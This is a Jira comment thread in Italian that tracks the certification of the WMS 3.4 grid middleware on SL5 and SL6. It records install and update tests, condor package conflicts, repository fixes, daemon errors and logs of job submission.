Comment by Danilo Nicola Dongiovanni [ 04/Sep/12 ]

Riepilogo-----------------------------
finito i test seguenti:

  • clean install SL5
  • update install (EMI1-> EMI2) SL5
  • Submission test both mode SL5
  • Submission test proxy mode SL5
  • Submission test on update install both mode SL5
  • clean install SL6
  • Submission test both mode SL6
  • Submission test proxy mode SL6

Tutti i log nella twiki e nel task di certificazione. come procediamo ora?

Comment by Danilo Nicola Dongiovanni [ 04/Sep/12 ]

Per log e dettagli riferirsi a:
https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/WMSTask21060SL5
https://wiki.italiangrid.it/twiki/bin/view/IGIRelease/WMSTask21060SL6

Comment by Danilo Nicola Dongiovanni [ 04/Sep/12 ]

TEST EMI1-> EMI2 Update passed.

TEST SUBMISSION SU UPDATE passed anche se mi da questo errore (e' trascurabile?):

===> ERROR: Command glite-wms-job-status --verbosity 0 https://cert-13.cnaf.infn.it:9000/8TrsHieqXo1ukD1Aaw9S2A failed. Failure message: **** Error: API_NATIVE_ERROR ****
Error while calling the "Job:getStatus" native api
Unable to retrieve the status for: https://cert-13.cnaf.infn.it:9000/8TrsHieqXo1ukD1Aaw9S2A
glite.lb.Exception: edg_wll_JobStatus: Connection refused: edg_wll_gss_connect()
at glite::lb::Job::status[./src/Job.cpp:87]

Comment by Danilo Nicola Dongiovanni [ 03/Sep/12 ]

TEST SUBMISSION PROXY MODE PASSED SL5+ SL6

Comment by Sara Bertocco [X] (Inactive) [ 03/Sep/12 ]

Puoi riprendere il test, adesso cream-29.pd e` a posto.

Comment by Danilo Nicola Dongiovanni [ 03/Sep/12 ]

riconfigurato cert-13 e cert-27 in modalita' proxy con devel17 (LB).
test fallisce per problemi a cream-29.pd
Sara sta debuggando il problema> test sospeso

Comment by Danilo Nicola Dongiovanni [ 31/Aug/12 ]

fatto test

clean install modalità both
sottomissione
riconfigurazione ok in modalità proxy.
Continuo da qui lunedì.

Comment by Danilo Nicola Dongiovanni [ 31/Aug/12 ]

Diamo per buona installazione SL6.
Sto rifacendo i seguenti test SL5

  • clean install modalità both
  • sottomissione
  • config in proxy mode
  • sottomissione
  • scratch e install con update da emi1 a emi2
Comment by Doina Cristina Duma [ 31/Aug/12 ]

Unit Test - richiedere a PaoloA. link dei report di unit tests. (CrisA)

Testsuite + tutte basic functionality tests - su tutte due piataf, eliminando la sottomissione verso LCG-CE.

Published Info - su tutte due

Performance tests - solo su SL5 eliminando PRIMA i CE con problemi (da eliminare cream-11(spento))

oggi 31.08 mandare il script verso uno dei due WMS installati da Danilo - lunedi verificare il risultato!

Regression tests:

  • principalmente su SL5 - il piu' grande numero possible in 3 giorni, resto si prende il log dalla pre-certificazione
  • su SL6 solo quelli che sembrano "specifici" ad SL6

La sottomissione "condor" si verifica usando sotomissione verso un ARC CE.

Nagios probes - non si testano (almeno in questa certificazione)

Comment by Doina Cristina Duma [ 31/Aug/12 ]

BTW - ho trovato che su cert-13 (SL%) c'e' il problema del "sudo":
http://www.eu-emi.eu/emi-1-kebnekaise-updates/-/asset_publisher/hHg1/content/issues-with-new-version-of-sudo-package-1-7-2p1-14-el5_8-2

che potrebbe essere uno dei mottivi dei errori. Ho applicato il fix.
Riprova con qualche job.

Invece su SL6 questo pb ("sudo) non dovrebbe presentarsi.

Comment by Doina Cristina Duma [ 31/Aug/12 ]

guardando l'ultimo log del update di cert-13 e le Release Notes per un update, mi sa che te l'ahi fatto a caso:

  • dopo aver installato i repo di emi-2 (emi-release-2.0.0) non hai piu' seguito quello scritto nelle release notes e hai fatto "yum update" seguito da "yum remove condor condor-lcg" che avrebbe avuto come effetto:

Removing for dependencies:
emi-wms x86_64 1.0.2-5.sl5 installed 0.0
glite-wms-jobsubmission x86_64 3.4.0-9.sl5 installed 471 k
glite-wms-jobsubmission-lib x86_64 3.4.0-9.sl5 installed 1.2 M

ma e' stato interotto - quindi nessuna rimozione del condor e condor-lcg

  • hai poi continuato facendo solo "yum install condor-emi"
  • hai fatto i cambiamenti di permessi del /var/log e configure, ma a questo punto non so quanto affidabile e' il risultato.

ho veirifcato ed in questo momento su cert-13 ci sono 3 rpm condor:
rpm -qa |grep condor
condor-7.4.2-1
condor-lcg-1.2.0-1
condor-emi-7.8.0-2

va bene, va male? chi sa. Non mi sembra e' stato previsto o pre-certificato cosi
e' vero che i vari rpm hanno path diversi e sembra che i daemoni sono quelli forniti da condor-emi, ma...

Vedi cosa dice Marco di questa situazione.

Comment by Doina Cristina Duma [ 30/Aug/12 ]

ok!

grazie!
ma a quale log ti riferivi prima? ho guardato quello di oggi e non ci sono i errori che riporti.

Comment by Danilo Nicola Dongiovanni [ 30/Aug/12 ]

fatti i principali controlli. ho passato la macchina a marco cecchi per vedere se ci capisce qualcosa.

Comment by Danilo Nicola Dongiovanni [ 30/Aug/12 ]

View attached file per i dettagli.

Comment by Danilo Nicola Dongiovanni [ 30/Aug/12 ]

Fatto test di installazione con update da emi1 a emi2.
INSTALLAZIONE E CONFIGURAZIONE SEMBRANO OK, DEMONI OK, ma la sottomissione non funziona , errore:

30 Aug, 12:50:05 I PID: 31025 - "wmpcommon::initWMProxyOperation": Remote CLIENT S DN: /C=CH/O=CERN/OU=GD/CN=Test user 594/CN=proxy/CN=proxy/CN=proxy/CN=proxy
30 Aug, 12:50:05 I PID: 31025 - "wmpcommon::initWMProxyOperation": Remote GRST CRED: GSIPROXY 1345977225 1347187124 4 /C=CH/O=CERN/OU=GD/CN=Test user 594/CN=proxy/CN=proxy
30 Aug, 12:50:05 I PID: 31025 - "wmpcommon::initWMProxyOperation": Service GRST PROXY LIMIT: 6
30 Aug, 12:50:05 I PID: 31025 - "wmpcommon::initWMProxyOperation": WMProxy instance serving core request N.: 19
30 Aug, 12:50:05 I PID: 31025 - "wmpcommon::getType": JDL Type: job
30 Aug, 12:50:05 S PID: 31025 - "WMPEventlogger::registerJob": edg_wll_RegisterJobProxy returned: Invalid argument (edg_wll_RegisterJobMaster(): unable to register job
Resource temporarily unavailable;; Logging library ERROR:
Resource temporarily unavailable;; edg_wll_DoLogEventServer(): edg_wll_log_direct_connect error
DNS resolver error;; edg_wll_gss_connect();; GSS Error: Resolver internal error)
30 Aug, 12:50:12 S PID: 31025 - "WMPEventlogger::registerJob": edg_wll_RegisterJobProxy returned: Invalid argument (edg_wll_RegisterJobMaster(): unable to register job
Resource temporarily unavailable;; Logging library ERROR:
Resource temporarily unavailable;; edg_wll_DoLogEventServer(): edg_wll_log_direct_connect error
DNS resolver error;; edg_wll_gss_connect();; GSS Error: Resolver internal error)
30 Aug, 12:50:18 S PID: 31025 - "WMPEventlogger::registerJob": edg_wll_RegisterJobProxy returned: Invalid argument (edg_wll_RegisterJobMaster(): unable to register job
Resource temporarily unavailable;; Logging library ERROR:
Resource temporarily unavailable;; edg_wll_DoLogEventServer(): edg_wll_log_direct_connect error
DNS resolver error;; edg_wll_gss_connect();; GSS Error: Resolver internal error)
30 Aug, 12:50:26 I PID: 31025 - "wmpgsoapoperations::ns1__jobRegister": ------------------------------- Fault description --------------------------------
30 Aug, 12:50:26 I PID: 31025 - "wmpgsoapoperations::ns1__jobRegister": Method: jobRegister
30 Aug, 12:50:26 I PID: 31025 - "wmpgsoapoperations::ns1__jobRegister": Code: 1227
30 Aug, 12:50:26 I PID: 31025 - "wmpgsoapoperations::ns1__jobRegister": Description: job registration failed
30 Aug, 12:50:26 I PID: 31025 - "wmpgsoapoperations::ns1__jobRegister": ----------------------------------------------------------------------------

Comment by Doina Cristina Duma [ 29/Aug/12 ]

si sarebbe per SL5, dove esiste la versione EMI 1

Comment by Danilo Nicola Dongiovanni [ 29/Aug/12 ]

ok, stavo guardando le extended release notes, dove non vedo il pezzo indicato.
Ho applicato i comandi ed ora sembra a posto.
Le macchine sono su con i servizi wms sl5 e sl6 e sembrano funzionare a livello basic.

Per update case cosa si intende: update da emi1 a emi2 ?

Comment by Doina Cristina Duma [ 29/Aug/12 ]

le release notes del task https://savannah.cern.ch/task/?21060 dicono:

The packages condor and condor-lcg, typical of the previous versions, are now replaced by condor-emi, which includes the full condor distribution plus a couple of security and functionality fixes, not ported upstream by the Condor team yet.

  • Fresh install:
  • yum install emi-wms condor-emi
  • run yaim
  • execute the cron job /etc/cron.d/glite-wms-create-host-proxy.cron
  • Update: condor-emi and condor will conflict. For this reason, it is suggested to follow these steps in the provided order:

1. yum remove condor condor-lcg
2. yum install emi-wms condor-emi
3. run yaim
4. set the ownership of the directories /var and /var/log to root.root, if not already the case
5. execute the cron job /etc/cron.d/glite-wms-create-host-proxy.cron

riptova!

Comment by Danilo Nicola Dongiovanni [ 29/Aug/12 ]

la prende dal repo cert sl6

Comment by Doina Cristina Duma [ 29/Aug/12 ]

la versione di condor che è installata non va bene
dovrebbe essere quella che trovi nel repo di certificaz: condor-emi-7.8.0-2.sl6.x86_64.rpm

Comment by Danilo Nicola Dongiovanni [ 29/Aug/12 ]

SL6 INSTALL LOG

Comment by Danilo Nicola Dongiovanni [ 29/Aug/12 ]

SL6 PROBLEMI

Problema di repository era errore nello script automatico.
Risolto quello installa ma ci sono dei problemi con condor e logmonitor.

durante la configurazione mancano delle directory condor, non so se e' un bug o voluto:
molte righe del tipo (vedi log allegato)

DEBUG: Configure Condor
/opt/glite/yaim/functions/config_condor_wms: line 65: /etc/condor/condor_config: No such file or directory
/opt/glite/yaim/functions/config_condor_wms: line 67: /usr/sbin/condor_configure: No such file or directory
grep: /etc/condor/condor_config: No such file or directory
grep: /etc/condor/condor_config: No such file or directory
grep: /etc/condor/condor_config.local: No such file or directory
grep: /etc/condor/condor_config.local: No such file or directory
/opt/glite/yaim/functions/config_condor_wms: line 105: /etc/condor/condor_config.local: No such file or directory
.....

Inoltre problemi con i demoni

      • glite-wms-lm:
        LogMonitor stopped.
      • glite-wms-jc:
        JobController stopped.

dopo la configurazione

Comment by Danilo Nicola Dongiovanni [ 29/Aug/12 ]

mi ero fermato al commento: da usare insieme al production.

Comment by Doina Cristina Duma [ 29/Aug/12 ]

il repo di certificazione è pronto con tutti i rpm menzionati da Paolo.

Comment by Doina Cristina Duma [ 28/Aug/12 ]

in un comment precedente avevo detto di usare il repository testing inquanto la "package list" nel task di emi-release e' stato mal compilato.
Nel pomeriggio Paolo ha corretto le liste SL5 e SL6, stasera aggiorno il repository di certification. e ti chiederei di riprovare o almeno un "yum clean all" seguito da "yum pdate".

Comment by Danilo Nicola Dongiovanni [ 28/Aug/12 ]

SL6 INSTALL TEST LOG

Comment by Danilo Nicola Dongiovanni [ 28/Aug/12 ]

SL6 FALLISCE installazione, qualche problema con repository?

ll /etc/yum.repos.d/
total 52
rw-rr- 1 root root 156 Feb 24 2012 cnaf-local.repo
rw-rr- 1 root root 235 Aug 28 17:45 egi-trustanchors.repo
rw-rr- 1 root root 253 May 17 04:31 emi2-base.repo
rw-rr- 1 root root 489 Jul 3 12:02 emi2-cert-sl6-base.repo
rw-rr- 1 root root 264 May 17 04:31 emi2-contribs.repo
rw-rr- 1 root root 273 May 17 04:31 emi2-third-party.repo
rw-rr- 1 root root 262 May 17 04:31 emi2-updates.repo
rw-rr- 1 root root 957 May 9 17:55 epel.repo
rw-rr- 1 root root 1056 May 9 17:55 epel-testing.repo -> SONO ENABLED=0
rw-rr- 1 root root 198 Aug 28 17:34 lemon.repo
rw-rr- 1 root root 853 Sep 25 2011 puppetlabs.repo
rw-rr-. 1 root root 2093 Jul 27 2011 sl-other.repo
rw-rr-. 1 root root 1767 Jan 26 2012 sl.repo

Comment by Danilo Nicola Dongiovanni [ 28/Aug/12 ]

SL5 INSTALL TEST

Comment by Danilo Nicola Dongiovanni [ 28/Aug/12 ]

SL5
Installazione OK.
CONFIGURAZIONE

DEMONI: PROBLEMI

[root@cert-13 tmp]# service gLite restart
STOPPING SERVICES

      • glite-lb-locallogger:
        Stopping glite-lb-logd ... done
        Stopping glite-lb-interlogd ... done
      • glite-proxy-renewald:
        Stopping ProxyRenewal Daemon: glite-proxy-renewd ... done
      • glite-wms-ice:
        stopping ICE... ok
      • glite-wms-jc:
        Stopping JobController daemon(s)
        Stopping JobController... JobController not running!
        Stopping CondorG... CondorG not running!
      • glite-wms-lm:
        Stopping LogMonitor... LogMonitor not running!
      • glite-wms-wm:
        stopping workload manager... ok
      • glite-wms-wmproxy:
        Stopping /usr/bin/glite_wms_wmproxy_server... ok
      • globus-gridftp:
        Stopping globus-gridftp-server: [ OK ]

STARTING SERVICES

      • globus-gridftp:
        Starting globus-gridftp-server: [ OK ]
      • glite-wms-wmproxy:
        Starting /usr/bin/glite_wms_wmproxy_server... ok
      • glite-wms-wm:
        starting workload manager... ok
      • glite-wms-lm:
        Starting LogMonitor.../usr/bin/glite-wms-log_monitor: error while loading shared libraries: libcondorapi.so: cannot open shared object file: No such file or directory
        [FAILED]
      • glite-wms-jc:
        Starting JobController daemon(s)
        Starting JobController.../usr/bin/glite-wms-job_controller: error while loading shared libraries: libcondorapi.so: cannot open shared object file: No such file or directory
        [FAILED]
        Starting CondorG...bash: /usr/sbin/condor_master: No such file or directory
        [FAILED]
      • glite-wms-ice:
        starting ICE... ok
      • glite-proxy-renewald:
        Starting ProxyRenewal Daemon: glite-proxy-renewd ... done
      • glite-lb-locallogger:
        Starting glite-lb-logd ...This is LocalLogger, part of Workload Management System in EU DataGrid & EGEE.
        done
        Starting glite-lb-interlogd ... done

Job SUBMIT OK
[dongiovanni@emitestbed08 ~]$ glite-wms-job-status https://cert-13.cnaf.infn.it:9000/2ofWqBhO4SALUU6RJwZZLg
======================= glite-wms-job-status Success =====================
BOOKKEEPING INFORMATION:
Status info for the Job : https://cert-13.cnaf.infn.it:9000/2ofWqBhO4SALUU6RJwZZLg
Current Status: Done (Success)
Exit code: 0

LISTMATCH OK

VARIE:

BDII_IPV6_SUPPORT richiesto nel siteinfo.def (non doveva essere messo un default automatico?)
service gLite status esce con exit value >0 anche se e' a posto, il che fa fallire lo script di deployment automatico.

Comment by Doina Cristina Duma [ 28/Aug/12 ]

per mottivi di lista pachetti non completa per questa volta si deve usare il repository di testing di EMI 2.

Comment by Doina Cristina Duma [ 27/Aug/12 ]

repositories certification SL5/SL6 pronti!

Comment by Doina Cristina Duma [ 27/Aug/12 ]

à quello che trovi al link sopra , nella descrizione del task.

This repositories MUST be used together with the production ones as they contain ONLY the packages that are under certification (as specified in the release tasks)

Comment by Danilo Nicola Dongiovanni [ 27/Aug/12 ]

macchine pronte:
cert-13 SL5
cert-27 SL6

preparo i moduli puppet.
Il repository da usare è ?

Comment by Doina Cristina Duma [ 01/Aug/12 ]

WMS 3.4 è pronto per essere certificato.

Discutiamo Venerdi (03.08) durante il meeting come organizzarci.

Generated at Mon May 12 09:24:14 CEST 2025 using Jira 10.3.5#10030005-sha1:190c783f2bd6c69cd5accdb70f97e48812a78d14.